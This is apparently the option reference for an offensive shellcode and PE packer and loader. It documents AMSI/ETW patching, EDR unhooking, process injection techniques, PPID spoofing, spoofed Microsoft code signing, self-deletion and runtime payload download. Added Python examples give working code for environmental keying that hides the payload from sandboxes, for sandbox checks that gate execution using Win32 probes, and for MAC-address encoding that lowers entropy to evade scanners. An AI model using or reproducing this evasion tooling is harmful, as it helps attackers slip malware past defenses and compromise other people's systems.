Option | Description
---|---
--shellcode | Encrypt shellcode; it is decrypted and loaded at runtime.
--dripallocate | Allocate memory DripLoader style: many small allocations with a delay in between instead of one large allocation.
--dripsleep | Sleep time in ms between the individual memory allocations (e.g. 500 milliseconds).
--CallbackExecute | Execute the shellcode via a custom callback function.
--localCreateThread | Use NtCreateThreadEx for local injection instead of calling the shellcode through a direct function pointer.
--QueueApc | Execute the shellcode via NtQueueApcThread instead of a direct pointer or thread creation.
--noWait | Don't call 'WaitForSingleObject(-1,-1)' after local injection but exit the process instead. If your shellcode exits the thread/process itself, this has no effect.
--mapSection | Map the shellcode into memory via NtCreateSection/NtMapViewOfSection. For remote injection, decryption happens AFTER the shellcode has been written into the remote process.
--remoteinject | Inject the shellcode into a newly spawned process (default: notepad); without this option the loader self-injects.
--customprocess | Spawn a custom process (instead of notepad) for remote injection.
--ruy-lopez | Use Ruy-Lopez to prevent AV/EDR DLLs from being loaded into the newly spawned process.
--remoteprocess | Inject into the specified (existing) remote process name; the loader uses the first process found with that name. Multiple names can be given, e.g. --remoteprocess=teams.exe,iexplore.exe,MicrosoftEdge.exe -> try teams first, then Internet Explorer, then Edge.
--spoofArgs | Spoof the command-line arguments of the process to inject into.
--parentProcess | Name of the parent process to spoof (PPID spoofing).
--blockDLLs | Set the DLL blocklist policy (DllBlocklistPolicy = 1) on the spawned process to prevent further DLLs from being loaded into it.
--remotepatchAMSI | Patch AMSI in the remote process before shellcode execution.
--remotepatchETW | Patch ETW in the remote process before shellcode execution.
--threadless | Use Threadless Inject for shellcode execution.
--threadlessDll | DLL to use for the Threadless Inject hook.
--threadlessFunc | Function to use for the Threadless Inject hook.
--poolparty | Use PoolParty variant 1, 2, 3 or 4 for execution.
--Caro-Kann | Use the Caro-Kann technique to bypass initial memory-scan detections: a second shellcode is injected which sleeps and then decrypts the actual payload.
--stomb | Enable Module Stomping so that no memory has to be allocated. By default, 'chakra.dll' is loaded and stomped.
--stombDll | DLL to use for Module Stomping (default: 'chakra.dll').
--stombFunc | Function to use for Module Stomping.
--stombFunc2 | Second function to use for Module Stomping. Only needed when combining Caro-Kann with Module Stomping, as there are two shellcodes then.
--restore | Restore the .text section of the stomped DLL after executing the shellcode, which gets rid of the Module Stomping IoCs. Only works with payloads that are reflective DLLs or which create a new thread.
Option | Description
---|---
--peinject | Encrypt a PE; at runtime it is decrypted and run as shellcode (converted via donut).
--peload | Encrypt a PE; at runtime it is decrypted and executed via a syscall-based variant of Run-PE.
Option | Description
---|---
--csharp | Encrypt a C# assembly and load it at runtime.
--interactivePS | Load an interactive unmanaged PowerShell runspace (see PwnPowershell on GitHub).
Option | Description
---|---
--dll | Generate a DLL instead of an executable.
--dllexportfunc | Comma-separated names of custom DLL export functions, e.g. for DLL sideloading.
--dllhijack | Add a DllMain export with a DLL_PROCESS_ATTACH handler for hijacking.
--noNimMain | Remove the NimMain export to avoid this IoC (use --dllhijack in addition to export DllMain instead, or alternatively --dllexportfunc DllMain).
--clone | Local DLL to clone the API exports from via Koppeling.
--dllProxy | Generate a DLL-proxying DLL; the legitimate DLL has to be placed in the build directory. Two output DLLs are generated: the proxy DLL and the randomly renamed legitimate DLL (credit: @byt3bl33d3r).
--cpl | Generate a CPL file (Control Panel applet) instead of an executable.
Option | Description
---|---
-h --help | Show this screen.
--version | Show version.
--key | Key to encrypt with.
--keyfile | File to read the key from.
--dnsKey | Use a remote DNS TXT record as key; it is retrieved at runtime.
--dnsdomain | Subdomain to use for the DNS TXT record.
--environmentalKey | Use an environmental key (domain, username) to encrypt with. domain: enumerate the current domain at runtime and use it as key. username: enumerate the current username at runtime and use it as key.
--arguments | Compile the following arguments into the encrypted exe/dll.
--metadata | Set custom resource file information (by default the cmd icon and cmd description for executables, ntdll metadata for DLLs).
--noETW | Don't use the ETW patch.
--noAMSI | Don't patch AMSI.
--noArgs | Don't provide any arguments to the assembly (some can only run without args).
--hide | Compile with the --app:gui flag so that no console window pops up.
--APIhide | Hide the console window via API calls: 'GetConsoleWindow' and 'ShowWindow' with 'SW_HIDE'.
--reflective | Set compiler flags so that the Nim loader binary can be reflectively loaded.
--debug | Compile the binary in debug mode.
--x86 | Compile an x86 binary.
--wow64 | Compile an x86 binary that runs under WOW64 on x64 systems.
--large | Use this for large payloads (bigger than 5MB); without it the build fails with "interpretation requires too many iterations".
--noDInvoke | Don't use DInvoke. Some older Windows versions (e.g. Windows Server 2012) may crash when DInvoke is in use; if you get "SIGSEGV: Illegal storage access. (Attempt to read from nil?)", try this option.
--verbose | Print output to the console (for troubleshooting).
--psout | PowerShell output format that reflectively loads the packed binary.
--psobfs | Pre-obfuscated PowerShell template (via Invoke-Obfuscation).
--pslyrics | Add song lyrics as comments to avoid some more detections.
--sourceonly | Don't compile; only create the source code and the compile command.
--RWX | Use RWX memory permissions for shellcode and PE loading (instead of the default RX).
--service | Create a service binary or DLL that can be used for lateral movement or persistence.
--stegofile | Path to a .bmp or .jpeg file in which the encrypted payload will be embedded.
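Environmental keying (the --environmentalKey option above) means the decryption key is never stored in the loader: it is derived from properties of the target host at runtime, so a sandbox or an analyst running the sample elsewhere derives a different key and never sees the plaintext payload. The Python block below is an added example written for this page, not the packer's own code. The key derivation (SHA-256 over "domain|username"), the HMAC-SHA256 counter keystream and the authentication tag are illustrative constructions chosen so the block runs offline with only the standard library; the packer's real cipher and derivation are not documented on this page, and the "CORP"/"alice" target is a constructed value.

```python
"""Environmental keying demo (added example; the cipher and derivation are
illustrative assumptions, not the packer's actual scheme)."""
import hashlib
import hmac
import os
from typing import Optional, Tuple

NONCE_LEN = 16  # per-payload nonce prepended to the ciphertext
TAG_LEN = 32    # HMAC-SHA256 tag appended to the ciphertext


def derive_key(domain: str, username: str) -> bytes:
    """Assumed derivation: SHA-256 over the lower-cased 'domain|username'.
    Lower-casing makes CORP\\alice and corp\\Alice produce the same key."""
    material = f"{domain.lower()}|{username.lower()}".encode("utf-8")
    return hashlib.sha256(material).digest()


def current_environment() -> Tuple[str, str]:
    """What a loader would enumerate on the target. USERDOMAIN/USERNAME are the
    Windows environment variables; the fallbacks keep the demo runnable elsewhere."""
    domain = os.environ.get("USERDOMAIN", "WORKGROUP")
    user = os.environ.get("USERNAME") or os.environ.get("USER", "unknown")
    return domain, user


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Illustrative stream cipher: HMAC-SHA256(key, nonce || counter) blocks."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        out += block
        counter += 1
    return bytes(out[:length])


def seal(key: bytes, payload: bytes, nonce: Optional[bytes] = None) -> bytes:
    """Encrypt at pack time: nonce || ciphertext || tag."""
    nonce = nonce or os.urandom(NONCE_LEN)
    ct = bytes(p ^ k for p, k in zip(payload, _keystream(key, nonce, len(payload))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unseal(key: bytes, blob: bytes) -> Optional[bytes]:
    """Decrypt at runtime. Returns None when the derived key is wrong, i.e. the
    loader is not running in the environment it was keyed to, so a wrong
    environment yields no garbage plaintext that could be scanned."""
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))


def demo() -> dict:
    """Pack for one environment, then 'run' in the intended one and in a sandbox."""
    payload = b"\x90" * 8 + b"\xcc"           # constructed stand-in for real shellcode
    target_key = derive_key("CORP", "alice")   # hypothetical target domain/user
    blob = seal(target_key, payload)
    sandbox_key = derive_key(*("WORKGROUP", "sandbox"))  # what a sandbox would derive
    return {
        "in_target_env": unseal(target_key, blob) == payload,
        "in_sandbox": unseal(sandbox_key, blob),
        "blob_len": len(blob),
    }


if __name__ == "__main__":
    print(demo())
    print("this host would derive:", derive_key(*current_environment()).hex())
```

The point of the tag check is that a loader keyed to the wrong environment must fail closed: without it, XOR with a wrong keystream would still produce bytes, and those bytes would be handed to the execution path.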
Option | Description
---|---
--sleep | Sleep 10 seconds before decryption to evade memory scanners.
--sleep-in-between | Sleep 10 seconds at some potentially critical steps in between to evade memory scanners.
--COMVARETW | Block ETW by setting the environment variable COMPlus_ETWEnabled to 0.
--unhook | Unhook the specified DLL(s) in the current process before doing anything else (comma-separated).
--obfuscate | Compile the Nim binary via Denim to make use of LLVM obfuscation.
--macPayload | Convert the encrypted shellcode to MAC-address strings to reduce entropy (embedded payloads only).
--sgn | Encode the shellcode via SGN before encrypting it.
--replace | Replace common Nim IoCs in the loader, like the string 'nim'.
--noOneShot | By default, the packer uses hardware breakpoints to bypass AMSI and disables them after the payload has been executed. Use this option to keep them enabled for the current thread.
--PatchAMSI | Bypass AMSI by patching an offset of amsi.dll!AmsiScanBuffer via syscalls.
--PatchETW | Bypass ETW by patching ntdll.dll!NtTraceEvent via syscalls.
--AMSIProviderPatch | Patch all AMSI providers instead of 'amsi.dll' (see AS-22-Korkos-AMSI-and-Bypass.pdf).
--AMSINtCreateSectionHook | Hook NtCreateSection to prevent 'amsi.dll' from being loaded.
--sandbox | Include sandbox checks of your choice in the loader. Domain: only execute if the target's domain equals the domain given via --domain; if --domain is not set, only execute on non-domain-joined systems. DomainJoined: only execute if the target is joined to ANY domain (you don't need to know the target's domain for this one). DiskSpace: only execute if the C:\ disk space is >= 200GB. MemorySpace: only execute if more than 4GB RAM is available. Emulated: call VirtualAllocExNuma (some sandboxes do not emulate it). WindowChanges: only execute once the current window has changed 7 or more times.
--domain | Domain to use for the sandbox evasion checks.
--pump | Pump the file with:
--self-delete | The loader deletes its own executable at runtime (credit: @byt3bl33d3r and @jonasLyk).
--obfuscatefunctions | Obfuscate some Nim-specific Windows API imports in the IAT via CallObfuscator; only possible from a Windows OS.
--sign | Sign the binary with a spoofed certificate.
--signdomain | Domain to use for the certificate (default: www.microsoft.com).
--llvm | Add compiler flags for LLVM obfuscation; you have to set LLVM up yourself.
--sleepycrypt | Encrypt the loader's memory with SleepyCrypt (experimental, pre-alpha; not yet working for C2 stagers).
--fluctuate | Enable ShellcodeFluctuation for local shellcode injection and PE loading (alpha); no support for remote injection. Only works for C2 payloads that use the Win32 Sleep function between connection attempts, as that is what gets hooked.
--noAntidebug | Leave out the anti-debugger checks.
--noDefaultSandBox | Leave out the default sandbox checks.
--noAntiEmulate | Leave out the anti-emulation checks.
--jmpEntry | Use a custom shellcode entrypoint inside a DLL-backed function to avoid unbacked memory as thread/APC start address. The target function is hooked with a JMP to the shellcode.
--jmpEntryDLL | DLL to use for the custom shellcode entrypoint.
--jmpEntryFunc | Function to use for the custom shellcode entrypoint.
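The --sandbox checks above are each a simple predicate over facts the loader gathers at runtime, with one subtlety worth getting right: Domain without --domain means "refuse to run on any domain-joined host", not "skip the check". The Python block below is an added example, not the packer's code. It encodes the documented semantics in should_execute() and, when run on Windows, gathers the facts through the Win32 APIs the page names (VirtualAllocExNuma) plus GlobalMemoryStatusEx, GetDiskFreeSpaceExW and NetGetJoinInformation via ctypes; off Windows it uses constructed facts. Applying the 200GB threshold to the total size of C:\ and leaving the WindowChanges counter at zero (a real loader would poll the foreground window) are assumptions made here.

```python
"""Sandbox-check policy (added example; thresholds as documented on the page)."""
import ctypes
import sys
from typing import Dict, List, Optional

GB = 1024 ** 3
NETSETUP_DOMAIN_NAME = 3        # NETSETUP_JOIN_STATUS value for a domain-joined host
MEM_RESERVE_COMMIT = 0x3000
PAGE_READWRITE = 0x04


def should_execute(checks: List[str], facts: Dict[str, object],
                   domain: Optional[str] = None) -> bool:
    """True only if every enabled check passes. facts keys: 'domain' (None when
    not joined), 'disk_bytes', 'mem_bytes', 'numa_alloc_ok', 'window_changes'."""
    for check in checks:
        if check == "Domain":
            current = facts.get("domain")
            if domain is None:
                ok = current is None            # no --domain given: only run off-domain
            else:
                ok = current is not None and str(current).lower() == domain.lower()
        elif check == "DomainJoined":
            ok = facts.get("domain") is not None
        elif check == "DiskSpace":
            ok = int(facts["disk_bytes"]) >= 200 * GB
        elif check == "MemorySpace":
            ok = int(facts["mem_bytes"]) > 4 * GB
        elif check == "Emulated":
            ok = bool(facts["numa_alloc_ok"])   # sandbox failed to emulate the NUMA call
        elif check == "WindowChanges":
            ok = int(facts["window_changes"]) >= 7
        else:
            raise ValueError(f"unknown sandbox check: {check}")
        if not ok:
            return False
    return True


def probe_windows() -> Dict[str, object]:
    """Gather the facts on a real Windows host (only called on win32)."""
    k32 = ctypes.windll.kernel32
    netapi = ctypes.windll.netapi32

    class MEMORYSTATUSEX(ctypes.Structure):
        _fields_ = [("dwLength", ctypes.c_ulong), ("dwMemoryLoad", ctypes.c_ulong),
                    ("ullTotalPhys", ctypes.c_ulonglong), ("ullAvailPhys", ctypes.c_ulonglong),
                    ("ullTotalPageFile", ctypes.c_ulonglong), ("ullAvailPageFile", ctypes.c_ulonglong),
                    ("ullTotalVirtual", ctypes.c_ulonglong), ("ullAvailVirtual", ctypes.c_ulonglong),
                    ("ullAvailExtendedVirtual", ctypes.c_ulonglong)]

    mem = MEMORYSTATUSEX()
    mem.dwLength = ctypes.sizeof(mem)
    k32.GlobalMemoryStatusEx(ctypes.byref(mem))

    total = ctypes.c_ulonglong(0)               # assumption: total size of C:\ counts
    k32.GetDiskFreeSpaceExW("C:\\", None, ctypes.byref(total), None)

    name = ctypes.c_wchar_p()
    status = ctypes.c_ulong(0)
    netapi.NetGetJoinInformation(None, ctypes.byref(name), ctypes.byref(status))
    domain = name.value if status.value == NETSETUP_DOMAIN_NAME else None
    netapi.NetApiBufferFree(name)

    k32.GetCurrentProcess.restype = ctypes.c_void_p
    k32.VirtualAllocExNuma.restype = ctypes.c_void_p
    k32.VirtualAllocExNuma.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t,
                                       ctypes.c_ulong, ctypes.c_ulong, ctypes.c_ulong]
    addr = k32.VirtualAllocExNuma(k32.GetCurrentProcess(), None, 0x1000,
                                  MEM_RESERVE_COMMIT, PAGE_READWRITE, 0)
    return {"domain": domain, "disk_bytes": total.value, "mem_bytes": mem.ullTotalPhys,
            "numa_alloc_ok": addr is not None, "window_changes": 0}


def gather_facts() -> Dict[str, object]:
    if sys.platform == "win32":
        return probe_windows()
    # Constructed facts for a typical corporate workstation, used off Windows.
    return {"domain": "CORP", "disk_bytes": 512 * GB, "mem_bytes": 16 * GB,
            "numa_alloc_ok": True, "window_changes": 0}


if __name__ == "__main__":
    facts = gather_facts()
    print(facts)
    print("run:", should_execute(["DomainJoined", "DiskSpace", "MemorySpace", "Emulated"], facts))
```

Note that each check is a one-way gate: the loader never tells the sandbox which check failed, it simply exits, so the facts dictionary is the only place worth logging during testing.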
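Byte entropy is a cheap static heuristic: an encrypted blob embedded as raw bytes sits at close to 8 bits per byte, which stands out against the rest of the binary. The --macPayload option above sidesteps this by storing the blob as MAC-address strings, whose alphabet is only hex digits plus separators. The Python block below is an added example, not the packer's code: the exact string format ("AA-BB-CC-DD-EE-FF", one address per line), zero-padding to a multiple of six bytes and storing the original length out of band are assumptions made for this illustration, and the random bytes stand in for an encrypted payload.

```python
"""MAC-address encoding of an encrypted payload to lower its byte entropy
(added example; the string layout is an assumption, not the packer's format)."""
import math
import random
from collections import Counter
from typing import List


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the maximum for uniformly random data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def to_mac_addresses(blob: bytes) -> List[str]:
    """Six bytes per address as 'AA-BB-CC-DD-EE-FF'; the tail is zero-padded, so
    the caller has to remember the original length."""
    padded = blob + b"\x00" * (-len(blob) % 6)
    return ["-".join(f"{b:02X}" for b in padded[i:i + 6])
            for i in range(0, len(padded), 6)]


def from_mac_addresses(macs: List[str], length: int) -> bytes:
    """Inverse transform the loader would perform at runtime before decryption."""
    raw = bytes(int(octet, 16) for mac in macs for octet in mac.split("-"))
    if len(raw) < length:
        raise ValueError("truncated payload: fewer bytes than recorded length")
    return raw[:length]


def embedded_form(blob: bytes) -> bytes:
    """How the payload would sit inside the binary: one address per line."""
    return "\n".join(to_mac_addresses(blob)).encode("ascii")


def demo(size: int = 1200) -> dict:
    """Compare the entropy of a random blob with its MAC-string form."""
    rng = random.Random(1)
    blob = bytes(rng.getrandbits(8) for _ in range(size))   # constructed stand-in for encrypted shellcode
    encoded = embedded_form(blob)
    decoded = from_mac_addresses(encoded.decode("ascii").split("\n"), len(blob))
    return {
        "raw_entropy": round(shannon_entropy(blob), 3),
        "encoded_entropy": round(shannon_entropy(encoded), 3),
        "roundtrip_ok": decoded == blob,
        "encoded_len": len(encoded),
    }


if __name__ == "__main__":
    print(demo())
```

The price is size: every six payload bytes become 18 characters, so the embedded payload triples, and the entropy drop is bounded by the 18-symbol alphabet (a little under 4 bits per byte for random input). A scanner that decodes hex-looking strings before measuring entropy is not fooled by this; the transform only defeats the naive whole-section measurement.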
By default, the loader uses GetSyscallStub to retrieve the syscall stubs from disk. Alternatives:
Option | Description
---|---
--hellsgate | Retrieve syscalls via the Hell's Gate technique.
--syswhispers | Embed syscalls via SysWhispers3 (NimLineWhispers3).
--jump | When using SysWhispers3, use the jumper_randomized technique.
By default, the loader embeds the payload into the output file. There are two alternatives:
Option | Description
---|---
--shellcodeFile | Filename to retrieve the payload from at runtime (no embedding). The first location is also used as the output location for the payload file. Multiple locations can be specified, separated by commas.
--shellcodeURL | URL to retrieve the payload from at runtime.